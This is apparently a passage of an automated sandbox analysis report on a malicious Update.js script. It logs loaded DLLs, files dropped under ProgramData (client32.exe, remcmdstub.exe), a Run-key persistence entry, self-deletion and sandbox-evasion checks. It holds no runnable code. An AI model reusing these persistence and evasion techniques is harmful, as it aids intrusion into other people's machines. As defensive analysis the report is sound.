Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File written: C:\ProgramData\o2xqxqs\nsm_vpro.ini

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Update.js

Static file information: File size 6752231 > 1048576

Source: C:\Windows\System32\wscript.exe

File opened: C:\ProgramData\o2xqxqs\msvcr100.dll

Jump to behavior

Source:

Binary string: msvcr100.i386.pdb source: client32.exe

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11146010 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,

4_2_11146010

Source: PCICL32.DLL.0.dr

Static PE information: section name: .hhshare

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11041721 push 3BFFFFFEh; ret	4_2_11041726
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1116FF15 push ecx; ret	4_2_1116FF28
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1116AE09 push ecx; ret	4_2_1116AE1C
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F832D80 push eax; ret	4_2_6F832D9E
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F840995 push ecx; ret	4_2_6F8409A8
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_6F85A6AA push EF3FEFD4h; iretd	4_2_6F85A6B1
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11041721 push 3BFFFFFEh; ret	5_2_11041726
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1116FF15 push ecx; ret	5_2_1116FF28
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1116AE09 push ecx; ret	5_2_1116AE1C
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C676BBF push ecx; ret	5_2_6C676BD2
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C66E36C push edi; ret	5_2_6C66E37B
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C668377 push 3BFFFFFFh; retf	5_2_6C66837C
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C66E3F7 push edi; ret	5_2_6C66E3F9
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C6694C5 push ecx; ret	5_2_6C6694D8

Source: msvcr100.dll.0.dr

Static PE information: section name: .text entropy: 6.909044922675825

Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\client32.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\msvcr100.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\client32.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\ProgramData\o2xqxqs\msvcr100.dll	Jump to dropped file

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 5_2_6C657030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,

5_2_6C657030

Source: C:\ProgramData\o2xqxqs\client32.exe

4_2_11128B10

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULL			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULL			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\update.js

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	4_2_110C1020
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11113380 IsIconic,GetTickCount,	4_2_11113380
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	4_2_110CB750
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	4_2_110CB750
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	4_2_111236E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	4_2_111236E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	4_2_11025A90
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	4_2_1115BAE0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	4_2_1115BAE0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	4_2_11113FA0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	4_2_11139ED0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,	4_2_11025EE0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	4_2_1115BEE0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	4_2_110241A0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	4_2_11024880
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	5_2_11139ED0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	5_2_110C1020
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11113380 IsIconic,GetTickCount,	5_2_11113380
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	5_2_110CB750
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	5_2_110CB750
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	5_2_111236E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	5_2_111236E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	5_2_11025A90
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	5_2_1115BAE0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	5_2_1115BAE0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	5_2_11113FA0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,	5_2_11025EE0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	5_2_1115BEE0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	5_2_110241A0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	5_2_11024880

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 4_2_11144140 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_11144140

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C6491F0		5_2_6C6491F0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_6C654F30		5_2_6C654F30

Delayed program exit found

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110B86C0 Sleep,ExitProcess,		4_2_110B86C0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 5_2_110B86C0 Sleep,ExitProcess,		5_2_110B86C0

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe	Window / User API: threadDelayed 429	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Window / User API: threadDelayed 414	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe	Window / User API: threadDelayed 7812	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\o2xqxqs\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\o2xqxqs\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\ProgramData\o2xqxqs\HTCTL32.DLL	Jump to dropped file

Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision	graph_4-86268
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision	graph_4-88921
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision	graph_4-87981
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision	graph_4-87987
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision	graph_4-89508
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision	graph_4-89613
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\o2xqxqs\client32.exe	Evaded block: after key decision

Source: C:\ProgramData\o2xqxqs\client32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_4-88905
Source: C:\ProgramData\o2xqxqs\client32.exe	Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\ProgramData\o2xqxqs\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-88611

Source: C:\ProgramData\o2xqxqs\client32.exe	API coverage: 2.4 %
Source: C:\ProgramData\o2xqxqs\client32.exe	API coverage: 6.5 %

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 5_2_6C654F30

5_2_6C654F30

Source: C:\ProgramData\o2xqxqs\client32.exe TID: 3128	Thread sleep time: -42900s >= -30000s	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe TID: 1732	Thread sleep time: -103500s >= -30000s	Jump to behavior
Source: C:\ProgramData\o2xqxqs\client32.exe TID: 1732	Thread sleep time: -1953000s >= -30000s	Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\ProgramData\o2xqxqs\client32.exe

Last function: Thread delayed

Source: C:\ProgramData\o2xqxqs\client32.exe

Code function: 5_2_6C653130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C653226h

5_2_6C653130

Source: C:\Windows\System32\wscript.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	4_2_111273E0
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1102D9CA Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102D9CA
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102DD21
Source: C:\ProgramData\o2xqxqs\client32.exe	Code function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	4_2_110663B0
